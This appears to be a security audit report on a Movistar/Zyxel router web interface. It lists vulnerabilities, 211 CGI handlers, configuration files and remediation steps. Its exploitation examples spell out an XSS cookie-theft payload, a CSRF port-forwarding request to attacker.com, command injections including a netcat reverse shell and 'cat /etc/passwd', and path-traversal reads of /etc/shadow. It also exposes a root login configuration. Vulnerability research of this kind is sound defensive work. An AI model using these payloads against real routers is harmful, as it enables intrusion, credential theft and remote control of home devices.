| No CSRF protection | CRITICAL | 8.1 | Easy | Unauthorized config changes |
| Weak password hash ($p$root) | CRITICAL | 9.1 | Medium | Full device compromise |
| Potential command injection (ping.cgi) | HIGH | 8.8 | Medium | Remote code execution |
| Path traversal (file browsers) | HIGH | 7.5 | Medium | Sensitive file disclosure |
| No HTTPS enforcement | HIGH | 7.4 | Medium | Credential interception |
| Session fixation possible | MEDIUM | 6.5 | Medium | Session hijacking |
| Verbose error messages | MEDIUM | 5.3 | Easy | Information disclosure |
| Debug features in production | MEDIUM | 6.1 | Hard | Potential bypass mechanisms |
| Telnet support | MEDIUM | 6.5 | Medium | Unencrypted access |
Affected Versions:
- jQuery 1.3.2 - CVE-2007-2379, multiple XSS issues
- jQuery 1.6.3 - CVE-2011-4969 (location.hash XSS)
Exploitation:
<!-- Trigger XSS via jQuery selector -->
http://192.168.1.1/page#<img src=x onerror=alert(document.cookie)>Impact:
- Session cookie theft
- Account takeover
- CSRF bypass
- Malicious actions as authenticated user
Remediation:
- Update all jQuery to 3.6.3+
- Remove jQuery 1.x versions
- Implement Content Security Policy (CSP)
Missing Protection:
- No CSRF tokens found in forms
- No SameSite cookie attribute
- No Referer validation
Exploitation:
<!-- Attacker site triggers config change -->
<img src="http://192.168.1.1/cgi-bin/portForwarding_add.cgi?port=22&ip=attacker.com">Impact:
- Unauthorized firewall rule changes
- Port forwarding to attacker
- WiFi password changes
- Admin account creation
Remediation:
- Implement CSRF tokens (per-session random value)
- Validate Referer header
- Use SameSite=Strict cookie attribute
- Require password for sensitive operations
Issues:
- Password hash format
$p$rootnon-standard - May be simple hash or placeholder
- No account lockout mechanism confirmed
- No 2FA/MFA support
Exploitation:
- Brute force attack on login
- Dictionary attack
- Credential stuffing
Remediation:
- Use bcrypt/scrypt for password hashing
- Implement account lockout (5 failed attempts)
- Add CAPTCHA after failed attempts
- Support 2FA/TOTP
Vulnerable CGIs (suspected):
ping.cgi- Likely executes systempingcommandDiagGeneral.cgi- May run diagnostic commandsmirror.cgi- Port mirroring configuration
Exploitation:
POST /cgi-bin/ping.cgi HTTP/1.1
target=8.8.8.8; cat /etc/passwd
target=8.8.8.8 | nc attacker.com 4444 -e /bin/shRemediation:
- Use safe APIs (no shell execution)
- Whitelist input (IP addresses only)
- Escape all shell metacharacters
- Use parameterized execution
Vulnerable CGIs:
fileSharing_browse.cgi- File browserviewlog.cgi- Log viewerbackupRestore.cgi- Config file access
Exploitation:
GET /cgi-bin/viewlog.cgi?file=../../../etc/shadow HTTP/1.1
GET /cgi-bin/fileSharing_browse.cgi?path=../../../../etc/passwd HTTP/1.1Remediation:
- Validate file paths against whitelist
- Use chroot for file operations
- Canonicalize paths (realpath())
- Deny
..in all file parameters
/usr/shared/web/html/config.json:
{
"CONFIG": {
"Implementation": "api",
"DefaultLanguage": "pt",
"Branding": "movistar",
"Country": "ES",
"LANGUAGES": [
{"file": "language.en.json", "shortName": "en"},
{"file": "language.pt.json", "shortName": "pt"}
],
"SessionMaxTime": 600,
"SessionWarning": false,
"UpdateStep": 10,
"VENDORCONFIGURATION": {
"Availability": true,
"Link": "http://192.168.1.1/main.html"
},
"LanConfEnabled": true,
"Supported3G": true,
"ManualPPPoE": true
}
}Key Settings:
- Session timeout: 600 seconds (10 minutes)
- Default language: Portuguese
- Branding: Movistar (Telefonica)
- 3G support: Enabled
- Manual PPPoE: Enabled
Runtime generated at:
/etc/mini_httpd1.conf/etc/mini_httpd2.conf/etc/mini_httpd3.conf/etc/mini_httpd4.conf
Expected Configuration:
port=80
ssl_port=443
ssl_cert=/etc/mycert/web.pem
chroot=/usr/shared/web
user=nobody
cgipat=/cgi-bin/*
pidfile=/tmp/mini_httpd1.pid
logfile=/tmp/mini_httpd1.log
/etc/config/rpcd:
config rpcd
option socket /var/run/ubus/ubus.sock
option timeout 30
config login
option username 'root'
option password '$p$root'
list read '*'
list write '*'
-
Update jQuery Libraries
- Remove jQuery 1.x versions
- Use only jQuery 3.6.3
- Test all JavaScript functionality
-
Implement CSRF Protection
- Generate random token per session
- Include in all forms as hidden field
- Validate token on all state-changing requests
-
Strengthen Authentication
- Replace
$p$rootwith proper bcrypt hash - Implement account lockout (5 attempts)
- Force password change on first login
- Replace
-
Enforce HTTPS
- Redirect HTTP → HTTPS automatically
- Set HSTS header
- Use secure cookies only
-
Input Validation Audit
- Review all 211 CGI binaries
- Implement whitelist validation
- Add length limits
-
Add Security Headers
Content-Security-Policy: default-src 'self' X-Frame-Options: DENY X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 -
Session Security
- Add SameSite=Strict to cookies
- Bind sessions to IP addresses (already done)
- Regenerate SessionKey on privilege escalation
-
Disable Unnecessary Services
- Disable Telnet (use SSH only)
- Disable debug endpoints
- Remove HTTP server instances 2-4 if unused
-
Code Audit
- Static analysis of all CGI binaries
- Penetration testing
- Fuzzing file upload handlers
-
Architecture Improvements
- Migrate to modern web framework (React/Vue + REST API)
- Separate frontend from backend
- Use JSON API instead of CGI
-
Monitoring & Logging
- Log all authentication attempts
- Alert on failed login patterns
- SIEM integration
-
Regular Updates
- Automated dependency scanning
- Security patch pipeline
- CVE monitoring
- login_advance.cgi
- logout_advance.cgi
- passLogout.cgi
- doregister.cgi
- clear_first_access.asp
- indexmain.cgi
- menuJson.cgi
- naviView_partialLoad.cgi
- info.cgi
- current.cgi
- statusview.cgi
- networkMap.cgi
- broadband.cgi
- connection_icon_list.cgi
- connection_table_list.cgi
- connectionStatus_p1.cgi
- wanRemoteNode_ETH_Edit.cgi
- wanRemoteNode_GPON_Edit.cgi
- lanSetup.cgi
- ipv6LanSetup.cgi
- dhcp_static_list.cgi
- staticDHCP_add.cgi
- staticDHCP.cgi
- ipalias.cgi
- wlan_general.cgi
- wlan_MACAuthentication.cgi
- wlan_macfilter_add.cgi
- wlan_macfilter_edit.cgi
- wlan_mac_address_list.cgi (+ 1,2,3 variants)
- wlan_moreAP.cgi
- wlan_moreap_edit.cgi
- wlan_others.cgi
- wlan_wps.cgi
- wlan_wpsinfo.cgi
- wlan_WpsStatus.cgi
- wlan_WPStimerRunning.cgi
- wlan_staionInfo.cgi
- wlan_staionInfo_list.cgi (+ 1,2,3 variants)
- moreApStatus.cgi
- wlan5_* (mirrors all 2.4GHz CGIs)
- wlan_scheduling.cgi
- wlan_schedule_add/edit/delete.cgi
- EasyMesh.cgi
- qos_general.cgi
- qos_class.cgi
- qos_queue.cgi
- qos_shaper.cgi
- qos_class_add.cgi
- queue_add.cgi
- shaper_add.cgi
- NAT_General.cgi
- NAT_AddrMapping.cgi
- nat.cgi
- portForwarding.cgi (+ add/edit/list/delete variants)
- portTriggering.cgi (+ add/edit/list variants)
- dmz.cgi
- addrMap_add.cgi
- static.cgi (+ add/list variants)
- ipv6static.cgi (+ add/list variants)
- dns_routing.cgi (+ add/list variants)
- gretunnel.cgi (+ add/list variants)
- ipTunnel.cgi
- dynamicDNS_InadynV2.cgi
- dynamicDNS_InterfaceIndex.cgi
- upnp.cgi
- current_upnp_table.cgi
- TELFirewall_*.cgi (13 variants)
- TR181Firewall.cgi (+ RuleEdit variant)
- IP_MAC_Filter.cgi
- ipMacFilterList.cgi
- URL_Filter.cgi (+ Edit/list/delete variants)
- Keyword_Filter_list.cgi
- ParentalControl.cgi
- ParentalControladd.cgi
- ParentalControl_view.cgi
- localCA.cgi (+ frame variant)
- trustedCA.cgi (+ add/view variants)
- sshCA_list.cgi
- sipServiceProvider.cgi (+ setting/list variants)
- sipAccount.cgi (+ setting/list variants)
- SIP_ALG.cgi
- phone.cgi
- callRule.cgi (+ CO variant)
- VoIPStatus.cgi (+ list variant)
- traffic_wan/lan/nat.cgi (+ frame variants)
- viewlog.cgi
- ViewSyslog.cgi
- RemMag*.cgi (General, WWW, WWW4Airtel, SNMP, DNS, ICMP, SSH, TELNET)
- backupRestore.cgi
- reboot.cgi (+ info variant)
- system.cgi
- time.cgi
- DiagGeneral.cgi
- ping.cgi
- mirror.cgi
- logSet.cgi
- zlog.cgi
- firewareUpgrade.cgi
- Fireware_UpgradesManaged.cgi
- tr69cfg.cgi
- tr369.cgi
- agentMTP.cgi (+ list variant)
- controller.cgi (+ list variant)
- stompConn.cgi (+ list variant)
- mqttClient.cgi (+ list variant)
- fileSharing.cgi (+ add/mod/del/list/browse variants)
- fileuser_*.cgi (add/mod/del/list variants)
- printServer.cgi
- userAccount.cgi
- PCP_ClientListIndex.cgi (+ view variant)
- PCP_list.cgi
- pcplist.cgi
- gponPassword.cgi
- vd.cgi
- vdview.cgi
- tabFW.cgi
- delete.cgi
- delete_RuleSum.cgi
- autofw_notify.asp (+ check variant)
- schedule_list.cgi
Total: 211 CGI binaries
InternetGatewayDevice.
├── DeviceInfo.
│ ├── ManufacturerOUI
│ ├── SerialNumber
│ └── SoftwareVersion
├── Layer3Forwarding.
│ └── Forwarding.{i}
├── LANDevice.{i}.
│ ├── WLANConfiguration.{i}.
│ │ ├── SSID
│ │ ├── BeaconType
│ │ └── ...
│ └── X_5067F0_IPv6LANHostConfigManagement.
├── WANDevice.{i}.
│ ├── WANConnectionDevice.{i}.
│ └── ...
├── X_5067F0_Ext.
│ ├── LoginPrivilegeMgmt.{i}
│ ├── Print
│ ├── FTP
│ └── ...
├── ManagementServer.
│ └── X_5067F0_CAContent
├── Mos.
│ └── MosUserConfig.
├── QoS.
├── Time.
├── IGMP.
└── ...
Note: X_5067F0_ prefix indicates vendor-specific extensions (5067F0 = Zyxel vendor code in hex)
Document Version: 2.0 Last Updated: 2025-10-06 Total Pages Documented: 38 page categories Total CGI Handlers: 211 Vulnerabilities Identified: 10 major issues Classification: Security Research - Confidential